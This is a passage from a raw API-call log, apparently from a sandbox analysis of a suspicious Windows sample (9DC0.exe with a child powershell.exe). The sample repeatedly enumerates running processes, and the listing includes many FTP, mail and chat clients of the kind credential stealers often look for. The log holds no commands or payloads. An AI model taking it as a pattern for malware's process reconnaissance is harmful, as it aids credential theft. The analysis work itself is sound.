th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.370] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0214.371] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.373] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.374] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0214.376] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.419] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0214.421] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.422] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0214.424] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.426] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0214.427] CloseHandle (hObject=0x1eb8) returned 1 [0214.427] Sleep (dwMilliseconds=0x64) [0214.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0214.480] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.481] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.483] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.484] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.486] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.487] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.489] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.490] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.491] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.493] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.554] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.556] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.557] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.559] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.560] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.561] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.564] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.570] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.572] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.573] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0214.575] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.576] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0214.578] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.580] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0214.582] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0214.583] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0214.585] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0214.586] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.588] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.589] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.595] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.597] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0214.598] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.600] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.602] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.603] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0214.604] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0214.606] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0214.613] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0214.614] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0214.616] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0214.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0214.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0214.620] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0214.622] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0214.624] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0214.626] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0214.627] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0214.629] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0214.631] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0214.632] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0214.634] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0214.637] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0214.638] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0214.640] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0214.641] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0214.643] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0214.645] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0214.647] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0214.649] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0214.651] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0214.652] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0214.655] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0214.657] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0214.659] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0214.661] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0214.664] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0214.666] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0214.668] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0214.670] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0214.679] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 